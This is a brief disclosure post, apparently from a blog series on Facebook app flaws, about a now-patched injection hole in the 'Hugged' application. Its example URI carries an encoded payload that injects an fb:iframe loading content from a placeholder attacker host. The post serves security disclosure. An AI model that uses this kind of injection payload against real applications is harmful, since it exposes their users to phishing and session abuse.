Posted by theharmonyguy in FAXX Hacks | No comments
FAXX Hack: Hugged
Facebook Verified Application
Current Monthly Active Users: 3,169,974
Current Rank on Application Leaderboard: 51
Application Developer: Manakki
Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”
Vulnerability Status: Patched
Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E